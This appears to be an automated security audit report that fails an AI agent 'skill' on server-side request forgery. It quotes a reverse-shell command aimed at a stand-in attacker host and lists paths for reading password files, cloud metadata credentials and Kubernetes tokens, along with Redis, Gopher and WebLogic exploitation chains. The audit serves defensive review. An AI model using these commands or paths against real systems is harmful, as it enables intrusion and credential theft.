ssrf-server-side-request-forgery
Fail
Audited by Gen Agent Trust Hub on Apr 10, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides functional shell commands intended for malicious use. Specifically, it includes a payload in
SKILL.mdto establish a reverse shell through Redis exploitation:bash -i >& /dev/tcp/attacker.com/4444 0>&1. It also describes how to escape Docker containers to execute commands on the host system via the Docker API (http://127.0.0.1:2375). - [DATA_EXFILTRATION]: Provides comprehensive methodologies for stealing sensitive data. This includes payloads for reading local files like
/etc/shadowand/etc/passwdvia thefile://scheme, and accessing internal network configurations using/proc/net/arp. It also includes instructions for exfiltrating cloud metadata from AWS, Google Cloud, Azure, and Alibaba Cloud endpoints. - [CREDENTIALS_UNSAFE]: Explicitly targets the harvesting of authentication tokens and private keys. The skill includes paths to extract AWS IAM security credentials, Google Cloud service account tokens, Azure OAuth2 identity tokens, and Kubernetes service account secrets (
/var/run/secrets/kubernetes.io/serviceaccount/token). - [REMOTE_CODE_EXECUTION]: Documents advanced exploitation chains to achieve RCE on internal infrastructure. This includes using the Gopher protocol to inject payloads into Redis, MySQL, or FastCGI, and exploiting CVE-2014-4210 (WebLogic SSRF) to write a reverse shell into the system's crontab.
- [EXTERNAL_DOWNLOADS]: References and encourages the use of external exploitation services and tools such as
rbndr.us(DNS rebinding),interact.sh(out-of-band interaction),Gopherus(payload generator), andSingularity(DNS rebinding framework).
Recommendations
- AI detected serious security threats
Audit Metadata